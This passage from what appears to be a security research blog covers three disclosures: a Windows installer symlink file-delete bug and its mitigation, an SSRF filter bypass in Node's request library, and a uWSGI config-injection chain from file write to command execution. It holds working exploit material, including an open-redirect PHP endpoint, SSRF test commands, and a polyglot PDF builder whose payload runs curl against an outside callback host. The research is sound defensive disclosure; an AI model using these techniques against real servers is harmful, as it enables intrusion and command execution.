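    return ntpath.join(programdata, "Microsoft", "Windows", "Start Menu", "Programs")


def is_redirected(environment):
    """Report whether PROGRAMDATA points somewhere other than the default."""
    value = environment.get("PROGRAMDATA", DEFAULT_PROGRAMDATA)
    # normcase() lowercases the path and unifies slashes for comparison.
    return ntpath.normcase(value) != ntpath.normcase(DEFAULT_PROGRAMDATA)


if __name__ == "__main__":
    for value in (DEFAULT_PROGRAMDATA, r"C:\FakeProgramData"):
        env = {"PROGRAMDATA": value}
        print(all_users_programs_dir(value), "redirected:", is_redirected(env))
```

With the default value the resulting directory sits under the locked-down C:\ProgramData\Microsoft path, while a poisoned value moves the whole tree to a location the user controls.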

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:





The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed in the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and the SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that the file is moved to a different location. This is how the Windows installer creates rollback instructions in case something goes wrong. As stated before, the SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with full SYSTEM privileges.



Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround, which was introduced in version 0.78. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equivalent and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned it the identifier CVE-2023-21800.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2023-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks whether the filesystem junction was created by a non-admin user and, if so, whether the policy prevents following it. If the operation is prevented, the error 0xC00004BC is returned. Junctions created by admin users are explicitly allowed as having a higher trust-level label.
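The decision described above can be modeled in a few lines of Python. This is a simplified sketch under stated assumptions, not the kernel's actual implementation: the Policy class and follow_junction function are hypothetical names, and the audit-only behavior (log but still follow) is an assumption about how the audit flag works.

```python
from dataclasses import dataclass

# Error code quoted in the text for a blocked redirection.
STATUS_BLOCKED = 0xC00004BC
STATUS_OK = 0


@dataclass
class Policy:
    audit: bool = False    # models AuditRedirectionTrust (assumed: log only)
    enforce: bool = False  # models EnforceRedirectionTrust


def follow_junction(policy, created_by_admin):
    """Return a status code for following a junction under the given policy."""
    if created_by_admin:
        # Junctions created by admin users carry a higher trust label.
        return STATUS_OK
    if policy.enforce:
        # Untrusted junction and enforcement is on: refuse to follow it.
        return STATUS_BLOCKED
    # Mitigation off or audit-only: the junction is still followed.
    return STATUS_OK


print(hex(follow_junction(Policy(enforce=True), created_by_admin=False)))
print(hex(follow_junction(Policy(enforce=True), created_by_admin=True)))
```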

In the initial round, Redirection Guard was enabled for the print service. The 2023-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>

#include <TlHelp32.h>

#include <cstdio>

#include <string>

#include <vector>

#include <memory>

#include <type_traits>

#include <utility>

using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;

using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {

std::vector<Proc> processes;

std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)> snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

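PROCESSENTRY32 pe32{};

pe32.dwSize = sizeof(pe32);

// Nothing to enumerate if the snapshot failed or contains no entries

if (snapshot.get() == INVALID_HANDLE_VALUE || !Process32First(snapshot.get(), &pe32)) {

return processes;

}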

do {

auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);

if (h) {

processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));

}

} while (Process32Next(snapshot.get(), &pe32));

return processes;

}

int main() {

auto runningProcesses = getRunningProcesses();

PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy;

for (auto& process : runningProcesses) {

auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

if (result && (policy.AuditRedirectionTrust | policy.EnforceRedirectionTrust | policy.Flags)) {

printf("%ws:\n", process.first.c_str());

printf("\tAuditRedirectionTrust: %d\n\tEnforceRedirectionTrust: %d\n\tFlags: %d\n", policy.AuditRedirectionTrust, policy.EnforceRedirectionTrust, policy.Flags);

}

}

}

The Redirection Guard should prevent an entire class of junction attacks and might significantly complicate local privilege escalation attacks. While it addresses the previously mentioned issue, it also addresses other types of installer bugs, such as when a privileged installer moves files from user-controlled directories.

| Status | Date |
|---|---|
| Vulnerability reported to Microsoft | 9 Oct 2022 |
| Vulnerability accepted | 4 Nov 2022 |
| Patch developed | 10 Jan 2023 |
| Patch released | 14 Feb 2023 |

Server Side Request Forgery (SSRF) is a fairly well-known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I had bypassed a filter that we had recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.
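As an illustration of why every hop matters, the following Python sketch applies an address filter to each URL in a redirect chain rather than only to the first one. It is a minimal model, assuming that "internal" means any address that is not globally routable; the function names is_internal_url and first_blocked_hop are hypothetical and are not part of any library discussed here.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_internal_url(url):
    """Return True if the URL's host resolves to any non-global address."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # no host to check: treat as unsafe
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # unresolvable: treat as unsafe
    for info in infos:
        # Drop a possible IPv6 scope suffix such as "%eth0" before parsing.
        address = ipaddress.ip_address(info[4][0].split("%")[0])
        if not address.is_global:
            return True
    return False


def first_blocked_hop(redirect_chain):
    """Given every URL visited, redirects included, return the first internal one."""
    for url in redirect_chain:
        if is_internal_url(url):
            return url
    return None


# The first hop is external, the redirect target is not.
print(first_blocked_hop(["https://8.8.8.8/redirect", "http://127.0.0.1/test"]))
```

A filter that only inspects the first element of the chain would let this request through. A real filter should also run the check at connection time, so that the address it validated is the address it connects to.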

None of the above is new, of course. All of these techniques have been around for years and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.

The client’s code was a simple endpoint created for integration. During the original engagement there was no filtering at all. After our test, the client applied the anti-SSRF library ssrfFilter. For research and code anonymity purposes, I have extracted the logic to a standalone Node.js script:

const request = require('request');

const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];

console.log("Testing", url);

request({

uri: url,

agent: ssrfFilter(url),

}, function (error, response, body) {

console.error('error:', error);

console.log('statusCode:', response && response.statusCode);

});

To verify a redirect bypass, I created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:

<?php header('Location: '.$_GET["target"]); ?>

The initial test demonstrates that the vulnerability is fixed:

$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test"

Testing http://tellico.fun/redirect.php?target=http://localhost/test

error: Error: Call to 127.0.0.1 is blocked.

But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:

$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"

Testing https://tellico.fun/redirect.php?target=http://localhost/test

error: null

statusCode: 200

What happened? The attacker server has redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.

Why is that? After some digging in the popular request library codebase, I have discovered the following lines in the lib/redirect.js file:

// handle the case where we change protocol from https to http or vice versa

if (request.uri.protocol !== uriPrev.protocol) {

delete request.agent

}

According to the code above, anytime the redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server caused a cross-protocol redirect. This is needed since the native Node.js http(s).Agent cannot be used with both protocols.

Unfortunately, such behavior also loses any event handling associated with the agent. Given that the SSRF prevention is based on the agent’s createConnection event handler, this unexpected behavior affects the effectiveness of SSRF mitigation strategies in the request library.
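The effect of dropping the agent can be reproduced with a small Python model. This is a sketch of the behavior described above, not the request library's code: the filtering_agent function, the follow function and the toy deny-list are all hypothetical stand-ins, and the redirect map replaces real network traffic.

```python
from urllib.parse import urlsplit

INTERNAL_HOSTS = {"localhost", "127.0.0.1"}  # toy deny-list, for the model only


class BlockedError(Exception):
    """Raised when the filtering agent refuses a destination."""


def filtering_agent(url):
    """Stands in for the anti-SSRF agent: refuses internal destinations."""
    host = urlsplit(url).hostname
    if host in INTERNAL_HOSTS:
        raise BlockedError(f"Call to {host} is blocked.")


def follow(start_url, redirects, drop_agent_on_protocol_switch, max_hops=5):
    """Follow a redirect map, applying the agent to each hop while it is attached."""
    agent = filtering_agent
    url = start_url
    for _ in range(max_hops):
        if agent is not None:
            agent(url)  # the filter only runs while the agent is attached
        if url not in redirects:
            return url  # final destination reached
        next_url = redirects[url]
        if (drop_agent_on_protocol_switch
                and urlsplit(next_url).scheme != urlsplit(url).scheme):
            agent = None  # models `delete request.agent`
        url = next_url
    raise RuntimeError("too many redirects")


def is_blocked(start_url, redirects, drop_agent_on_protocol_switch):
    try:
        follow(start_url, redirects, drop_agent_on_protocol_switch)
    except BlockedError:
        return True
    return False


same_protocol = {"http://tellico.fun/redirect": "http://localhost/test"}
cross_protocol = {"https://tellico.fun/redirect": "http://localhost/test"}

print(is_blocked("http://tellico.fun/redirect", same_protocol, True))
print(is_blocked("https://tellico.fun/redirect", cross_protocol, True))
print(is_blocked("https://tellico.fun/redirect", cross_protocol, False))
```

In this model only the cross-protocol redirect with agent dropping enabled reaches the internal host; the other two cases are stopped by the filter.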

This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-day mark, we decided to publish the full technical details as well as a public GitHub issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID was assigned to this vulnerability.

Since a supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.

The node-fetch library also allows overwriting an HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');

const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];

console.log("Testing", url);

fetch(url, {

agent: ssrfFilter(url)

}).then((response) => {

console.log('Success');

}).catch(error => {

console.log(`${error.toString().split('\n')[0]}`);

});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"

Testing https://tellico.fun/redirect.php?target=http://localhost/test

TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

The axios library’s options allow overwriting agents for both protocols separately. Therefore the following code is protected:

axios.get(url, {

httpAgent: ssrfFilter("http://domain"),

httpsAgent: ssrfFilter("https://domain")

})

Note: In the axios library, it is necessary to hardcode the URLs during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for the wrong protocol and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {

// httpAgent: ssrfFilter(url),

httpsAgent: ssrfFilter(url)

})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
          - pattern-either:
              - pattern: |
                  {..., httpsAgent:..., ...}
              - pattern: |
                  {..., httpAgent:..., ...}
          - pattern-not: |
              {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

- .htaccess, .config, web.config, httpd.conf, __init__.py and .xml files
- .php, .asp and .jsp files
- venv
- .bashrc, .bash-profile and .profile
- authorized_keys and authorized_keys2, to gain SSH access

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

In our scenario, the application had a vulnerable endpoint through which an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

drwxrwxr-x 6 root root 4096 Nov 18 13:48 .

-rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, including loading configuration from simple files on disk (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128. The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

while (len) {

ini_line = ini_get_line(ini, len);

if (ini_line == NULL) {

break;

}

lines++;

// skip empty line

key = ini_lstrip(ini);

ini_rstrip(key);

if (key[0] != 0) {

if (key[0] == '[') {

section = key + 1;

section[strlen(section) - 1] = 0;

}

else if (key[0] == ';' || key[0] == '#') {

// this is a comment

}

else {

// val is always valid, but (obviously) can be ignored

val = ini_get_key(key);

if (!strcmp(section, section_asked)) {

got_section = 1;

ini_rstrip(key);

val = ini_lstrip(val);

ini_rstrip(val);

add_exported_option((char *) key, val, 0);

}

}

}

len -= (ini_line - ini);

ini += (ini_line - ini);

}
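The practical consequence of this loop is that lines outside the requested section are simply skipped, so arbitrary data may precede the “[uwsgi]” marker. The Python sketch below mirrors the control flow of the C excerpt to show this. It is a simplified model, not uWSGI's full parser: the parse_ini function is a hypothetical name, and details such as NUL-terminated strings and exact whitespace handling are not reproduced.

```python
def parse_ini(data, section_asked="uwsgi"):
    """Collect key/value options that appear under [section_asked]."""
    options = []
    section = ""
    for raw_line in data.split(b"\n"):
        # latin-1 maps every byte to a character, so binary data never fails to decode.
        key = raw_line.decode("latin-1").strip()
        if not key:
            continue  # skip empty line
        if key.startswith("["):
            section = key[1:-1]  # drop the first and last character, as the C code does
        elif key[0] in ";#":
            continue  # this is a comment
        elif section == section_asked:
            name, _, value = key.partition("=")
            options.append((name.strip(), value.strip()))
    return options


blob = b"%PDF-1.4\n\x00\xffbinary junk\n[uwsgi]\nfoo = @(exec://whoami)\n"
print(parse_ini(blob))
```

Everything before the section header is ignored, while the option that follows it is picked up even though the surrounding bytes do not form a valid configuration file.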

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

[uwsgi]

; read from a symbol

foo = @(sym://uwsgi_funny_function)

; read from binary appended data

bar = @(data://0)

; read from http

test = @(http://doyensec.com/hello)

; read from a file descriptor

content = @(fd://3)

; read from a process stdout

body = @(exec://whoami)

; call a function returning a char *

characters = @(call://uwsgi_func)

While abusing the above .ini files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting for the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

[uwsgi]

home = /app

uid = webapp

gid = webapp

chdir = /app/console

socket = 127.0.0.1:8001

wsgi-file = /app/console/uwsgi-sockets.py

gevent = 500

logto = /var/log/uwsgi/%n.log

harakiri = 30

vacuum = True

py-auto-reload = 3

callable = app

pidfile = /var/run/uwsgi-sockets-console.pid

log-maxsize = 100000000

log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak
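The idea behind such a reload option can be illustrated with a small polling sketch in Python. This is an assumption-laden illustration of change detection via modification times, not uWSGI's actual implementation; the function names snapshot_mtimes and changed_files are hypothetical.

```python
import os
import tempfile


def snapshot_mtimes(paths):
    """Record the current modification time of each watched file."""
    return {path: os.stat(path).st_mtime_ns for path in paths}


def changed_files(previous, paths):
    """Return the watched files whose modification time differs from the snapshot."""
    current = snapshot_mtimes(paths)
    return [path for path in paths if current[path] != previous.get(path)]


with tempfile.TemporaryDirectory() as workdir:
    module = os.path.join(workdir, "app.py")
    with open(module, "w") as handle:
        handle.write("print('hello')\n")
    before = snapshot_mtimes([module])

    # Overwrite the module with arbitrary bytes, then bump its timestamp explicitly
    # so the demo does not depend on filesystem timestamp resolution.
    with open(module, "wb") as handle:
        handle.write(b"%PDF-1.4 not valid Python")
    later = before[module] + 10**9
    os.utime(module, ns=(later, later))

    print(changed_files(before, [module]))
```

Note that the detection depends only on the file changing, not on the new contents being valid Python, which is why overwriting a module with non-Python data is enough to trigger it.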

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

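from fpdf import FPDF
from exiftool import ExifToolHelper

# Embed the multi-line .ini payload in the image's EXIF "model" tag.
# The -E option lets the value carry its newlines as &#xa; entities.
with ExifToolHelper() as et:
    et.set_tags(
        ["doyensec.jpg"],
        tags={"model": "&#xa;[uwsgi]&#xa;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#xa;"},
        params=["-E", "-overwrite_original"]
    )

class MyFPDF(FPDF):
    pass

# Build a PDF that includes the tagged image, metadata and all.
pdf = MyFPDF()
pdf.add_page()
pdf.image('./doyensec.jpg')
pdf.output('payload.pdf', 'F')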

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

1. Write payload.pdf into /app/console/uwsgi-sockets.ini.
2. Trigger a reload of the uWSGI configuration, for example by overwriting a .py file.
3. Observe the request made by curl on Burp Collaborator.

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.